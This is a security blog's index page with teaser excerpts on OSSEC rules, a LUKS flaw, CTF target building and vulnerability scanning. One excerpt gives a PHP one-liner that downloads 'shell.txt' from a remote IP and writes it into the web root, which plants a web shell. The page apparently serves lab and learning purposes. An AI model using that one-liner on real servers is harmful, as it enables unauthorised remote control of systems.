OSSEC creating ‘ignore’ rules
For automated log monitoring and alerting, several years ago I decided to start using OSSEC. The nice thing about OSSEC
Read moreFor automated log monitoring and alerting, several years ago I decided to start using OSSEC. The nice thing about OSSEC
Read morephp file transfer Nice PHP Example to transfer code <?php file_put_contents(“/var/www/html/sedje.php”, file_get_contents(“http://10.13.37.152/shell.txt”));?> interactive shell A method for better interactive shell
Read moreRecently I decided to stop breaking stuff on my web server, dns server and other internal infrastructure. It simply takes
Read moreHalfway past November, a vulnerability in the LUKS Full-disk encryption for linux systems was discovered (CVE-2016-4484). Since I use this
Read moreLast month I started working on something that feels extremely counter-intuitive. Building targets for a hacking ‘Capture The Flag‘ event.
Read moreWhen working with scanning tools, you must first determine what type of scanner you are working with. There are several
Read moreIn my working life I have had various roles as security consultant. One of these roles was working in an
Read moreVulnerability management (processes) and therefore vulnerability scanning (techniques) are a requirement for any organization that takes security serious. In my
Read moreAs part of my pursuit for more knowledge in the information security field, I visited the InfoSecurity.nl Conference in Utrecht,
Read moreLost of people seem to worry about the NSA and other government authorities prying in and spying on personal information
Read more